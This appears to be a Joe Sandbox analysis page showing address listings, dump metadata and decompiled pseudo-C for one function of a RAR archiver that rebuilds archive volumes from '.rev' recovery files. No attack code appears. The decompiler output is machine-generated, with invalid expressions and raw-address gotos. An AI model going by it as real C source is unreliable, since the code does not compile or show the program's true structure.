                                                                                                            0x7ff650b1e4a3
                                                                                                            0x7ff650b1e4a5
                                                                                                            0x7ff650b1e4a8
                                                                                                            0x7ff650b1e4b2
                                                                                                            0x7ff650b1e4c2
                                                                                                            0x7ff650b1e4ce
                                                                                                            0x7ff650b1e4d7
                                                                                                            0x7ff650b1e4e0
                                                                                                            0x7ff650b1e4f0
                                                                                                            0x7ff650b1e4f9
                                                                                                            0x7ff650b1e500
                                                                                                            0x7ff650b1e50e
                                                                                                            0x7ff650b1e517
                                                                                                            0x7ff650b1e526
                                                                                                            0x7ff650b1e532
                                                                                                            0x7ff650b1e539
                                                                                                            0x7ff650b1e549
                                                                                                            0x7ff650b1e551
                                                                                                            0x7ff650b1e556
                                                                                                            0x7ff650b1e55b
                                                                                                            0x7ff650b1e560
                                                                                                            0x7ff650b1e56b
                                                                                                            0x7ff650b1e5a1

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: swprintf
                                                                                                            • String ID: CMT$h%u$hc%u
                                                                                                            • API String ID: 233258989-3282847064
                                                                                                            • Opcode ID: 72646ff26140f2ad77c83545c045003265142396ba4934d4583381b2d1f86788
                                                                                                            • Instruction ID: 6ea15027a8885eb9919169bf0e94d4cfc9dede0417eb1875728f74332a4d6ccd
                                                                                                            • Opcode Fuzzy Hash: 72646ff26140f2ad77c83545c045003265142396ba4934d4583381b2d1f86788
                                                                                                            • Instruction Fuzzy Hash: ED42F422A096D3A5EB11DF20C4851FE27A5EB52744F8E4035DA6FE7386FE7AE644C340
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B4BFB4 Relevance: 7.1, Strings: 5, Instructions: 858COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E00007FF67FF650B4BFB4(void* __ecx, void* __edx, void* __ebp, void* __rax, signed long long __rbx, long long __rcx, long long __rdx, void* __r8, void* __r9) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t343;
				signed int _t345;
				signed int _t346;
				void* _t357;
				signed int _t402;
				void* _t409;
				void* _t423;
				signed int _t447;
				signed int _t474;
				signed int _t502;
				signed int _t503;
				signed int _t505;
				signed int _t511;
				signed long long _t514;
				void* _t520;
				void* _t521;
				void* _t541;
				intOrPtr _t543;
				signed int _t584;
				intOrPtr _t605;
				signed long long _t619;
				signed long long _t626;
				void* _t627;
				void* _t629;
				intOrPtr _t631;
				signed long long _t633;
				signed long long _t634;
				signed long long _t642;
				signed long long _t643;
				intOrPtr _t644;
				signed long long _t652;
				intOrPtr _t661;
				signed long long _t664;
				signed long long _t665;
				signed short* _t697;
				intOrPtr _t711;
				void* _t743;
				signed long long _t761;
				void* _t788;
				void* _t794;
				void* _t828;
				void* _t829;
				intOrPtr _t836;
				signed long long _t841;
				signed long long _t845;
				intOrPtr* _t847;
				void* _t849;
				signed short* _t851;
				signed long long _t854;
				void* _t855;
				signed long long _t857;
				intOrPtr* _t859;
				void* _t862;
				void* _t863;
				void* _t865;
				signed long long _t866;
				signed long long _t881;
				void* _t886;
				void* _t887;
				void* _t888;
				signed long long _t889;
				signed long long _t891;
				signed long long* _t893;
				void* _t896;
				intOrPtr _t899;
				signed long long _t900;
				void* _t902;
				void* _t903;
				signed long long _t904;
				signed long long _t905;
				signed long long _t906;
				signed long long _t907;
				void* _t912;
				signed long long _t915;

				_t886 = __r9;
				_t664 = __rbx;
				_t520 = __ebp;
				 *((long long*)(_t865 + 0x20)) = __rbx;
				_t863 = _t865 - 0x23370;
				E00007FF67FF650B69CB0(0x23470, __rax, _t887, _t888);
				_t866 = _t865 - __rax;
				_t619 =  *0x50b978f0; // 0x27db226282f1
				 *(_t863 + 0x23360) = _t619 ^ _t866;
				 *(_t866 + 0x39) = r9b;
				_t621 = __r8;
				 *((long long*)(_t866 + 0x48)) = __rdx;
				 *((long long*)(_t866 + 0x50)) = __rcx;
				r15d = 0x800;
				r8d = r15d;
				E00007FF67FF650B5A390(_t863 + 0x1d360, __r8, __r8);
				E00007FF67FF650B44330(__r8, _t863 + 0x1d360);
				_t829 = __r8;
				 *((char*)(_t866 + 0x3c)) = 0;
				if (__r8 == 0) goto 0x50b4c18a;
				if (E00007FF67FF650B5D600(__r8, L".rev") != 0) goto 0x50b4c18a;
				r14b = 1;
				 *(_t866 + 0x30) = r14b;
				 *((char*)(_t866 + 0x3c)) = E00007FF67FF650B4A74C(_t621, __rbx, _t863 + 0x1d360, __rdx, _t912);
				if (_t829 - _t863 + 0x1d362 <= 0) goto 0x50b4c09d;
				_t14 = _t829 - 2; // -2
				_t851 = _t14;
				if (E00007FF67FF650B59F44(_t863 + 0x1d360) != 0) goto 0x50b4c089;
				if ( *_t851 != 0x5f) goto 0x50b4c098;
				if (_t851 - _t863 + 0x1d362 > 0) goto 0x50b4c073;
				_t852 =  *((intOrPtr*)(_t866 + 0x48));
				_t626 = _t851 - _t863 + 0x1d360 >> 1;
				E00007FF67FF650B5A390(_t851, L"*.*", _t912 - _t626);
				E00007FF67FF650B34918(_t863 + 0x1e360);
				E00007FF67FF650B34A9C(_t863 + 0x1e360);
				 *(_t863 + 0x2ff0) = _t664;
				 *(_t863 + 0x2ff8) = _t664;
				 *(_t863 + 0x3000) = _t664;
				r8d = 0;
				if (E00007FF67FF650B349C4(_t626, _t664, _t863 + 0x1e360, _t863 + 0x1fe0,  *((intOrPtr*)(_t866 + 0x48)), _t902) == 0) goto 0x50b4c17c;
				E00007FF67FF650B173C8(_t664, _t863 + 0x13f80,  *((intOrPtr*)(_t866 + 0x48)),  *((intOrPtr*)(_t866 + 0x48)), _t896, _t889);
				if (E00007FF67FF650B3298C(_t863 + 0x13f80, _t863 + 0x1fe0) == 0) goto 0x50b4c14a;
				if (E00007FF67FF650B18E38(1, _t664, _t863 + 0x13f80, _t828) != 0) goto 0x50b4c158;
				E00007FF67FF650B175D4(_t664, _t863 + 0x13f80);
				goto 0x50b4c0f7;
				E00007FF67FF650B5A390(_t863 + 0x1d360, _t863 + 0x1fe0, _t912);
				E00007FF67FF650B175D4(_t664, _t863 + 0x13f80);
				E00007FF67FF650B34930(_t863 + 0x1e360);
				goto 0x50b4c191;
				r14b = 0;
				 *(_t866 + 0x30) = 0;
				E00007FF67FF650B173C8(_t664, _t863 + 0xafb0,  *((intOrPtr*)(_t866 + 0x48)), _t852, _t849, _t862);
				if (E00007FF67FF650B1AA04( *_t851 & 0x0000ffff, _t626, _t863 + 0xafb0, _t912) != 0) goto 0x50b4c1cb;
				E00007FF67FF650B175D4(_t664, _t863 + 0xafb0);
				goto 0x50b4cda2;
				if ( *((intOrPtr*)(_t863 + 0x12f2d)) != 0) goto 0x50b4c1e6;
				E00007FF67FF650B111C0(0x2f, _t863 + 0x1d360);
				goto 0x50b4c1b8;
				dil =  *(_t863 + 0x12f32);
				 *(_t866 + 0x3a) = dil;
				E00007FF67FF650B31CF0(_t664, _t863 + 0xafb0);
				r9b = dil;
				E00007FF67FF650B4531C(0x2f, 1, _t626, _t863 + 0x1d360, _t863 + 0x1d360, _t912);
				E00007FF67FF650B5A390(_t863 + 0x21360, _t863 + 0x1d360, _t912);
				_t627 = _t863 + 0x1d360;
				_t833 = _t626 - _t627 >> 1;
				 *(_t866 + 0x60) = _t626 - _t627 >> 1;
				E00007FF67FF650B5A390(_t863 + 0x21360 + _t833 * 2, L"*.rev", _t912 - _t833);
				 *(_t866 + 0x68) = _t664;
				r15b = 0;
				 *((char*)(_t866 + 0x38)) = 0;
				E00007FF67FF650B34918(_t863 + 0xfd0);
				E00007FF67FF650B34A9C(_t863 + 0xfd0);
				 *(_t863 + 0xf90) = _t664;
				 *(_t863 + 0xf98) = _t664;
				 *(_t863 + 0xfa0) = _t664;
				 *(_t866 + 0x34) = 0;
				 *(_t866 + 0x44) = 0;
				r12d = 0;
				 *(_t866 + 0x40) = 0;
				r8d = 0;
				_t788 = _t863 - 0x80;
				E00007FF67FF650B349C4(_t627, _t664, _t863 + 0xfd0, _t788, _t852);
				if (0 == 0) goto 0x50b4c5d0;
				if (r14b != 0) goto 0x50b4c334;
				if (dil != 0) goto 0x50b4c33d;
				dil = 1;
				E00007FF67FF650B44330(_t627, _t863 - 0x80);
				if (_t627 == 0) goto 0x50b4c334;
				_t697 = _t627 - 2;
				if (_t697 - _t863 - 0x80 <= 0) goto 0x50b4c334;
				r8d =  *_t697 & 0x0000ffff;
				if (r8w == 0x2e) goto 0x50b4c326;
				_t71 = _t788 + 1; // 0x2
				_t324 =  !=  ? 0 : _t71;
				_t472 =  !=  ? 0 : _t71;
				_t629 = _t863 - 0x80;
				if (_t697 - 2 - _t629 > 0) goto 0x50b4c301;
				_t541 = ( !=  ? 0 : _t71) - 2;
				_t499 =  ==  ? 0 : dil & 0xffffffff;
				 *((intOrPtr*)(_t866 + 0x3c)) =  ==  ? 0 : dil & 0xffffffff;
				if (dil == 0) goto 0x50b4c484;
				_t543 = r15b;
				if (_t543 != 0) goto 0x50b4c351;
				E00007FF67FF650B164E4(0x78);
				 *((char*)(_t866 + 0x38)) = 1;
				E00007FF67FF650B111C0(0x66, _t863 - 0x80);
				E00007FF67FF650B31C28(_t863 + 0x1e360);
				_t790 = _t863 - 0x80;
				E00007FF67FF650B32864();
				_t79 = _t790 + 2; // 0x2
				r8d = _t79;
				E00007FF67FF650B32730(0x66, 0, _t543, _t629, _t863 + 0x1e360, _t863 - 0x80, _t912 - _t833);
				E00007FF67FF650B32890(0, _t664, _t863 + 0x1e360, _t852);
				_t903 = _t629;
				_t82 = _t629 - 7; // -7
				r8d = 0;
				E00007FF67FF650B32730(0x66, 0, _t543, _t629, _t863 + 0x1e360, _t82, _t912 - _t833);
				E00007FF67FF650B32138(_t863 + 0x1e360);
				 *(_t863 + 0x1cf58) = 1;
				if (_t543 != 0) goto 0x50b4c3bc;
				E00007FF67FF650B32138(_t863 + 0x1e360);
				if (8 - 0x20 < 0) goto 0x50b4c3dd;
				_t88 = _t903 - 4; // -4
				 *((intOrPtr*)(_t866 + 0x28)) = 0;
				 *((long long*)(_t866 + 0x20)) = _t88;
				_t631 =  *((intOrPtr*)(_t866 + 0x48));
				r9d =  *((intOrPtr*)(_t631 + 0x9518));
				r8d = 0;
				E00007FF67FF650B32BDC(0, _t863 + 0x1e360, _t866 + 0x58, _t852 - 1, _t912 - _t833);
				if (0 << 0 ==  *(_t866 + 0x58)) goto 0x50b4c476;
				E00007FF67FF650B111C0(0x7d, _t863 - 0x80);
				E00007FF67FF650B31C70(_t863 + 0x1e360);
				r14b =  *(_t866 + 0x30);
				r8d = 0;
				_t794 = _t863 - 0x80;
				E00007FF67FF650B349C4(_t631, _t664, _t863 + 0xfd0, _t794, _t852 - 1);
				if (0 == 0) goto 0x50b4c5d0;
				r15b =  *((intOrPtr*)(_t866 + 0x38));
				goto 0x50b4c2cc;
				E00007FF67FF650B31C70(_t863 + 0x1e360);
				goto 0x50b4c4f4;
				E00007FF67FF650B44330(_t631, _t863 - 0x80);
				_t836 = _t631;
				if (_t631 == 0) goto 0x50b4c451;
				r14b = 0;
				_t854 = _t664;
				E00007FF67FF650B59F44(_t863 - 0x80);
				if (0 == 0) goto 0x50b4c4c0;
				_t633 = _t863 - 0x80 +  *(_t866 + 0x60) * 2;
				if (_t836 - 2 - _t633 >= 0) goto 0x50b4c4a0;
				_t711 = _t836;
				_t343 = E00007FF67FF650B5D5D0(_t633, _t711, _t794);
				 *((intOrPtr*)(_t863 + 0x1cf50 + _t854 * 4)) = _t343;
				if (_t343 == 0) goto 0x50b4c4da;
				if (_t343 - 0xff <= 0) goto 0x50b4c4dd;
				r14b = 1;
				_t855 = _t854 + 1;
				if (_t855 - 3 < 0) goto 0x50b4c4a0;
				_t899 =  *((intOrPtr*)(_t866 + 0x50));
				if (r14b != 0) goto 0x50b4c448;
				_t474 =  *(_t863 + 0x1cf54);
				_t447 =  *(_t863 + 0x1cf58);
				if (_t794 + _t711 - 0xff > 0) goto 0x50b4c448;
				_t345 =  *(_t866 + 0x44);
				if (_t345 == 0) goto 0x50b4c51e;
				if (_t345 != _t474) goto 0x50b4c5a9;
				_t346 =  *(_t866 + 0x34);
				if (_t346 == 0) goto 0x50b4c52a;
				if (_t346 != _t447) goto 0x50b4c5a9;
				 *(_t866 + 0x44) = _t474;
				_t511 = _t447;
				 *(_t866 + 0x34) = _t447;
				r8d = 0x800;
				E00007FF67FF650B5A390(_t863 + 0x22360, _t863 - 0x80, _t912 - _t833);
				E00007FF67FF650B69B58(_t633, _t863 + 0x22360);
				 *(_t866 + 0x70) = _t633;
				if (_t633 == 0) goto 0x50b4c56b;
				E00007FF67FF650B31C28(_t633);
				goto 0x50b4c56e;
				E00007FF67FF650B32864();
				 *(_t899 + _t633 * 8 - 8) = _t664;
				r12d = r12d + 1;
				if ( *(_t866 + 0x68) != _t664) goto 0x50b4c44c;
				E00007FF67FF650B320B8(_t664, _t664, _t855);
				 *(_t866 + 0x68) = _t633;
				goto 0x50b4c44c;
				E00007FF67FF650B112C8(0x32, _t863 - 0x80, _t863 + 0x22360);
				E00007FF67FF650B34930(_t863 + 0xfd0);
				goto 0x50b4c1b8;
				if ( *(_t866 + 0x39) == 0) goto 0x50b4c5db;
				if (r12d == 0) goto 0x50b4c5bf;
				_t357 = E00007FF67FF650B110C0(0x79, r12d);
				if (r12d == 0) goto 0x50b4c5bf;
				r8d = 0x100;
				E00007FF67FF650B6C1A0(_t357, 0, _t863 + 0x1fe0, _t863 - 0x80, _t863 + 0x22360);
				 *((short*)(_t863 + 0x20360)) = 0;
				r15d = 0;
				_t634 = _t511;
				 *(_t863 + 0x1cf50) = _t634;
				if (_t511 <= 0) goto 0x50b4c846;
				_t904 = _t664;
				E00007FF67FF650B69B58(_t634, _t863 + 0x1fe0);
				 *(_t866 + 0x70) = _t634;
				if (_t634 == 0) goto 0x50b4c646;
				E00007FF67FF650B173C8(_t664, _t634,  *((intOrPtr*)(_t866 + 0x48)), _t855);
				goto 0x50b4c649;
				_t841 = _t664;
				E00007FF67FF650B3345C();
				if (0 == 0) goto 0x50b4c7a9;
				E00007FF67FF650B32864();
				E00007FF67FF650B18E38(0, _t664, _t841);
				sil = 0;
				if (0 == 0) goto 0x50b4c708;
				goto 0x50b4c694;
				if ( *((intOrPtr*)(_t841 + 0x22ec)) == 5) goto 0x50b4c6a3;
				E00007FF67FF650B1A3E8();
				E00007FF67FF650B1E5A8(_t841, _t841, _t855);
				if (_t634 != 0) goto 0x50b4c683;
				goto 0x50b4c708;
				E00007FF67FF650B111C0(0x66, _t863 + 0x1d360);
				if ( *((intOrPtr*)(_t841 + 0x585d)) == 0) goto 0x50b4c708;
				 *((intOrPtr*)(_t866 + 0x28)) = 0;
				 *((long long*)(_t866 + 0x20)) =  *((intOrPtr*)(_t841 + 0x7f68));
				r9d =  *((intOrPtr*)( *((intOrPtr*)(_t866 + 0x48)) + 0x9518));
				r8d = 0;
				E00007FF67FF650B32BDC(0, _t841, _t866 + 0x58, _t855, _t863 + 0x22360);
				if ( *((intOrPtr*)(_t841 + 0x5854)) ==  *(_t866 + 0x58)) goto 0x50b4c708;
				sil = 0;
				E00007FF67FF650B111C0(0x7d, _t863 + 0x1d360);
				if (sil != 0) goto 0x50b4c78b;
				 *0x50b80550();
				r8d = 0x800;
				E00007FF67FF650B5A390(_t863 + 0x1e360, _t863 + 0x1d360, _t863 + 0x22360);
				r8d = 0x800;
				E00007FF67FF650B5A368( *((intOrPtr*)( *_t841 + 0x10)), _t863 + 0x1e360, _t863 + 0x22360);
				E00007FF67FF650B111C0(0x75, _t863 + 0x1d360);
				E00007FF67FF650B112C8(0x77, _t863 + 0x1d360, _t863 + 0x1e360);
				E00007FF67FF650B33B2C(0,  *((intOrPtr*)( *_t841 + 0x10)), _t664, _t863 + 0x1d360, _t863 + 0x1e360, _t855);
				r8d = 0;
				 *0x50b80550();
				if (sil != 0) goto 0x50b4c816;
				r8d = 0x12;
				E00007FF67FF650B31E84( *((intOrPtr*)( *_t841 + 0x20)), _t841, _t863 + 0x1d360);
				if (0 == 0) goto 0x50b4c867;
				 *((char*)(_t863 + _t904 + 0x1fe0)) = 1;
				 *(_t866 + 0x40) =  *(_t866 + 0x40) + 1;
				_t169 = _t855 - 1; // -1
				if (r15d != _t169) goto 0x50b4c7f4;
				r8d = 0x800;
				E00007FF67FF650B5A390(_t863 + 0x20360, _t863 + 0x1d360, _t863 + 0x1e360);
				E00007FF67FF650B111C0(0x7b, _t863 + 0x1d360);
				E00007FF67FF650B111C0(0x96, _t863 + 0x1d360);
				 *(_t899 + _t904 * 8) = _t841;
				r8b =  *(_t866 + 0x3a) == 0;
				E00007FF67FF650B44E90(0x96, 0x800,  *((intOrPtr*)( *_t841 + 0x20)), _t664, _t863 + 0x1d360, _t855, _t863);
				r15d = r15d + 1;
				_t905 = _t904 + 1;
				if (_t905 -  *(_t866 + 0x34) < 0) goto 0x50b4c620;
				_t502 =  *(_t866 + 0x40);
				E00007FF67FF650B110C0(0x7a, _t502);
				if (_t502 != 0) goto 0x50b4c896;
				E00007FF67FF650B164E4(_t841 + 0x33);
				goto 0x50b4c5bf;
				E00007FF67FF650B110C0(0x34, r12d);
				E00007FF67FF650B164E4(0x35);
				E00007FF67FF650B2C924(_t502, _t664, 0x50ba7ab8, _t863 + 0x1d360, _t886);
				goto 0x50b4c5bf;
				if (_t502 - r12d <= 0) goto 0x50b4c8b7;
				E00007FF67FF650B110C0(0x34, r12d);
				E00007FF67FF650B164E4(0x36);
				goto 0x50b4cd87;
				E00007FF67FF650B164E4(0x7c);
				r12d =  *(_t866 + 0x44);
				r15d = _t889 + _t855;
				 *(_t866 + 0x34) = r15d;
				r8d = 0;
				 *(_t866 + 0x44) = 0;
				if (r15d <= 0) goto 0x50b4c912;
				_t642 = _t664;
				if ( *((intOrPtr*)(_t863 + _t642 + 0x1fe0)) != 0) goto 0x50b4c8fa;
				if ( *((intOrPtr*)(_t899 + _t642 * 8)) != _t664) goto 0x50b4c903;
				 *((intOrPtr*)(_t863 + 0x1cf60)) = 0;
				r8d = r8d + 1;
				_t643 = _t642 + 1;
				if (_t643 - r15d < 0) goto 0x50b4c8ea;
				 *(_t866 + 0x44) = r8d;
				 *(_t866 + 0x78) = _t664;
				_t906 = _t905 | 0xffffffff;
				 *(_t866 + 0x58) = _t906;
				E00007FF67FF650B283F0(L"     ", _t863 + 0x1cf64, _t863 + 0x1e360, _t886);
				_t900 = _t643;
				_t644 =  *((intOrPtr*)(_t866 + 0x48));
				_t503 =  *(_t644 + 0x9518);
				 *(_t866 + 0x40) = _t503;
				_t645 =  <  ? _t906 : _t644;
				E00007FF67FF650B69B9C(_t863 + 0x1cf64, _t886);
				 *(_t866 + 0x60) =  <  ? _t906 : _t644;
				_t584 = _t503;
				if (_t584 == 0) goto 0x50b4c982;
				E00007FF67FF650B55D38(r12d, _t503, _t521,  <  ? _t906 : _t644, _t863 + 0x1cf64, _t645, _t855);
				if (_t584 != 0) goto 0x50b4c96a;
				E00007FF67FF650B5B008();
				r14d = 0;
				_t857 = _t664;
				if (r15d <= 0) goto 0x50b4ca1f;
				if ( *((intOrPtr*)(_t863 + _t857 + 0x1fe0)) != 0) goto 0x50b4cb26;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t866 + 0x50)) + _t857 * 8)) == 0) goto 0x50b4cb26;
				r12d = r14d;
				if ( *0x50b80550() == _t900) goto 0x50b4ca00;
				E00007FF67FF650B6C1A0(_t397, 0, _t397 + _t889 * _t900 +  *((intOrPtr*)( *((intOrPtr*)(_t866 + 0x50)) + 0x800)),  *((intOrPtr*)( *((intOrPtr*)(_t866 + 0x50)) + 0x800)) + _t889 * _t900, _t900 - _t397);
				if (r15d <= 0) goto 0x50b4ca08;
				_t505 = r15d;
				r15d =  *(_t866 + 0x34);
				r14d = r14d + 1;
				if (_t857 + 1 - r15d < 0) goto 0x50b4c998;
				if (_t505 == 0) goto 0x50b4cbc3;
				_t915 =  *(_t866 + 0x68);
				_t907 =  *(_t866 + 0x78);
				_t514 = E00007FF67FF650B59AD8(_t907, _t915);
				_t652 =  *((intOrPtr*)(_t866 + 0x48));
				if ( *((intOrPtr*)(_t652 + 0x7154)) != 0) goto 0x50b4ca67;
				if (_t514 ==  *(_t866 + 0x58)) goto 0x50b4ca67;
				_t881 = _t915;
				E00007FF67FF650B5CE78(_t505, _t514 -  *(_t866 + 0x58), _t652, _t664, _t907, _t645 + 0x2c48, _t857 + 1, _t881, _t886);
				 *(_t866 + 0x58) = _t514;
				_t891 = _t505;
				 *(_t866 + 0x70) = _t891;
				 *(_t866 + 0x78) = _t907 + _t891;
				r14d = 0;
				r8d =  *(_t866 + 0x40);
				_t402 = _t505 / r8d;
				_t516 =  <  ? _t505 : _t402;
				r15d = 0;
				if (_t505 <= 0) goto 0x50b4cb60;
				r12d = _t881 - 1;
				_t665 =  *((intOrPtr*)(_t866 + 0x50));
				_t405 =  !=  ?  <  ? _t505 : _t402 : _t505 - r14d;
				_t517 =  !=  ?  <  ? _t505 : _t402 : _t505 - r14d;
				_t743 = _t652 * 0x2c48 +  *(_t866 + 0x60);
				 *((long long*)(_t743 + 0x2c10)) =  *((intOrPtr*)(_t665 + 0x800));
				 *(_t743 + 0x2c20) = r14d;
				r14d = r14d + ( !=  ?  <  ? _t505 : _t402 : _t505 - r14d);
				 *(_t743 + 0x2c24) = r14d;
				 *(_t743 + 0x2c28) =  *(_t866 + 0x34);
				 *(_t743 + 0x2c30) = _t900;
				 *((long long*)(_t743 + 0x2c38)) = _t863 + 0x1cf60;
				 *(_t743 + 0x2c40) =  *(_t866 + 0x44);
				if (r8d - 1 <= 0) goto 0x50b4cb43;
				_t409 = E00007FF67FF650B5B224(_t863 + 0x1cf60, _t665,  *(_t665 + 0x828), 0x7ff650b4b820, _t857 + 1, _t743);
				goto 0x50b4cb48;
				E00007FF67FF650B6C1A0(_t409, 0,  *(_t665 + 0x828) * _t900 +  *((intOrPtr*)(_t863 + 0x1d760)), 0x7ff650b4b820, _t900);
				goto 0x50b4ca0d;
				E00007FF67FF650B4A550(_t505, _t665,  *(_t665 + 0x828) * _t900 +  *((intOrPtr*)(_t863 + 0x1d760)), _t857 + 1);
				r15d = r15d + 1;
				r8d =  *(_t866 + 0x40);
				if (r14d - _t505 < 0) goto 0x50b4caa4;
				E00007FF67FF650B5B518( *((intOrPtr*)( *((intOrPtr*)(_t866 + 0x50)) + 0x828)));
				_t845 = _t665;
				r15d =  *(_t866 + 0x34);
				if ( *(_t863 + 0x1cf50) <= 0) goto 0x50b4c982;
				if ( *((intOrPtr*)(_t863 + _t845 + 0x1fe0)) == 0) goto 0x50b4cbb4;
				E00007FF67FF650B329C4(0, 0, _t520,  *(_t863 + 0x1cf50), _t665,  *((intOrPtr*)( *((intOrPtr*)(_t866 + 0x50)) + _t845 * 8)), 0x7ff650b4b820 * _t900 +  *((intOrPtr*)( *((intOrPtr*)(_t866 + 0x50)) + 0x800)),  *(_t866 + 0x70));
				if (_t845 + 1 -  *(_t863 + 0x1cf50) < 0) goto 0x50b4cb8b;
				goto 0x50b4c982;
				0x50b69b94();
				if (r15d <= 0) goto 0x50b4cc5a;
				_t859 = _t863 + 0x1fe0;
				r14d = r15d;
				_t893 =  *((intOrPtr*)(_t866 + 0x50));
				r13d =  *((intOrPtr*)(_t866 + 0x3c));
				_t847 =  *_t893;
				if (_t847 == 0) goto 0x50b4cc4d;
				if (r13b == 0) goto 0x50b4cc39;
				_t605 =  *_t859;
				if (_t605 == 0) goto 0x50b4cc39;
				 *0x50b80550();
				r8d = 0;
				 *0x50b80550();
				r15d = 7;
				E00007FF67FF650B323C4(0);
				if (_t605 != 0) goto 0x50b4cc29;
				_t661 =  *((intOrPtr*)( *_t847 + 0x10));
				 *0x50b80550();
				 *_t893 = _t665;
				_t860 = _t859 + 1;
				if (_t605 != 0) goto 0x50b4cbea;
				if ( *((intOrPtr*)(_t863 + 0x20360)) == 0) goto 0x50b4cd47;
				E00007FF67FF650B173C8(_t665, _t863 + 0x1fe0,  *((intOrPtr*)(_t866 + 0x48)), _t859 + 1);
				r8d = 1;
				E00007FF67FF650B19410(_t665, _t863 + 0x1fe0, _t863 + 0x20360, _t847, _t859 + 1);
				if (0 == 0) goto 0x50b4cd3b;
				E00007FF67FF650B18E38(1, _t665, _t863 + 0x1fe0);
				if (0 == 0) goto 0x50b4cd3b;
				E00007FF67FF650B1E9C4(5, _t661, _t665, _t863 + 0x1fe0, _t859 + 1, _t863);
				if (_t661 == 0) goto 0x50b4cd3b;
				r8d = 0;
				E00007FF67FF650B1A3A0(_t665, _t863 + 0x1fe0,  *((intOrPtr*)(_t863 + 0x9f50)), _t859 + 1);
				r8d = 0x2000;
				_t423 = E00007FF67FF650B19810(_t665, _t863 + 0x1fe0, _t863 + 0x1e360, _t859 + 1,  *(_t866 + 0x70));
				if (_t423 <= 0) goto 0x50b4cd14;
				_t761 = _t665;
				if ( *((intOrPtr*)(_t863 + _t761 + 0x1e360)) != 0) goto 0x50b4cd14;
				if (_t761 + 1 - _t423 < 0) goto 0x50b4cd01;
				if (1 != _t423) goto 0x50b4cd3b;
				r8d = 0;
				E00007FF67FF650B1A3A0(_t665, _t863 + 0x1fe0,  *((intOrPtr*)(_t863 + 0x9f50)), _t859 + 1);
				E00007FF67FF650B32940(_t863 + 0x1fe0);
				E00007FF67FF650B175D4(_t665, _t863 + 0x1fe0);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t866 + 0x48)) + 0x7154)) != 0) goto 0x50b4cd65;
				E00007FF67FF650B283F0(0x50b84a60,  *((intOrPtr*)(_t863 + 0x9f50)), _t423, _t886);
				if ( *(_t866 + 0x39) != 0) goto 0x50b4cd85;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t866 + 0x48)) + 0x7156)) != 0) goto 0x50b4cd85;
				E00007FF67FF650B54598(0xd28, _t505, _t665, _t860, _t863, _t423);
				E00007FF67FF650B283F0( *((intOrPtr*)(_t866 + 0x48)),  *((intOrPtr*)(_t863 + 0x9f50)), _t423, _t886);
				E00007FF67FF650B34930(_t863 + 0xfd0);
				E00007FF67FF650B175D4(_t665, _t863 + 0xafb0);
				return E00007FF67FF650B69D10(1, 0xd28,  *(_t863 + 0x23360) ^ _t866);
			}
















































































                                                                                                            0x7ff650b4bfb4
                                                                                                            0x7ff650b4bfb4
                                                                                                            0x7ff650b4bfb4
                                                                                                            0x7ff650b4bfb4
                                                                                                            0x7ff650b4bfc4
                                                                                                            0x7ff650b4bfd1
                                                                                                            0x7ff650b4bfd6
                                                                                                            0x7ff650b4bfd9
                                                                                                            0x7ff650b4bfe3
                                                                                                            0x7ff650b4bfea
                                                                                                            0x7ff650b4bfef
                                                                                                            0x7ff650b4bff5
                                                                                                            0x7ff650b4bffd
                                                                                                            0x7ff650b4c002
                                                                                                            0x7ff650b4c008
                                                                                                            0x7ff650b4c015
                                                                                                            0x7ff650b4c021
                                                                                                            0x7ff650b4c026
                                                                                                            0x7ff650b4c02b
                                                                                                            0x7ff650b4c032
                                                                                                            0x7ff650b4c049
                                                                                                            0x7ff650b4c04f
                                                                                                            0x7ff650b4c052
                                                                                                            0x7ff650b4c063
                                                                                                            0x7ff650b4c071
                                                                                                            0x7ff650b4c073
                                                                                                            0x7ff650b4c073
                                                                                                            0x7ff650b4c081
                                                                                                            0x7ff650b4c087
                                                                                                            0x7ff650b4c096
                                                                                                            0x7ff650b4c098
                                                                                                            0x7ff650b4c0aa
                                                                                                            0x7ff650b4c0bd
                                                                                                            0x7ff650b4c0c9
                                                                                                            0x7ff650b4c0dd
                                                                                                            0x7ff650b4c0e2
                                                                                                            0x7ff650b4c0e9
                                                                                                            0x7ff650b4c0f0
                                                                                                            0x7ff650b4c0f7
                                                                                                            0x7ff650b4c10f
                                                                                                            0x7ff650b4c11b
                                                                                                            0x7ff650b4c136
                                                                                                            0x7ff650b4c148
                                                                                                            0x7ff650b4c151
                                                                                                            0x7ff650b4c156
                                                                                                            0x7ff650b4c169
                                                                                                            0x7ff650b4c176
                                                                                                            0x7ff650b4c183
                                                                                                            0x7ff650b4c188
                                                                                                            0x7ff650b4c18a
                                                                                                            0x7ff650b4c18d
